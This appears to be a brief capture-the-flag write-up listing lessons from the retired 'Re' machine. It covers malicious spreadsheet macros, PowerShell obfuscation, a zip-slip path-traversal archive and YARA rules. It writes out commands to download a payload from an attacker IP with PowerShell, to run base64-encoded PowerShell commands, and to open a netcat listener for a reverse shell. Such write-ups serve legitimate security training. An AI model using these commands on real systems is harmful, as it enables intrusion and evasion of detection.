The Re box created from 0xdf was retired later this day. I did solve the box after it was retired so now I am going to show you some key things I learned from this box. A list of these is here:
Sometimes smbmap may throw false postivies. I always try to use smbclient.
libreoffice calc also support macros, we can run malicious command from these docs.
We can use Invoke-Obfuscation
for powershell obfuscation
The famous yara rules I saw on twitter but never took the chance to search it. Yara rules are basically a way to search for some common strings you provide to yara in order to identify malicious programs/files.
I almost forgot about .ace files and winrar, and zipslip. This exploit was used on the box to go from one user to another. We had to create a malicious .zip file which contains inside a malicious file with a path traversal as filename.
I used this tool to make chisel.exe a little bit smaller. I have seen this from ippsec
We can download file from powershell by using iwr -uri ip/file -outfile filename.evil
We can run base64 encoded powershell commands but we need to use convert the strings to utf16 little endian using the command: iconv -t utf-16le and then pipe it to base64. After we can run the command by using powershell -encodedcommand base64string==
Use rlwrap -nc -nvlp 7979 to have working arrow keys on windows.
Like LinEnum but for windows.
Thats all. I didn’t do the uninteded way. If you want to learn more goto 0xdf blog or see ippsec videos.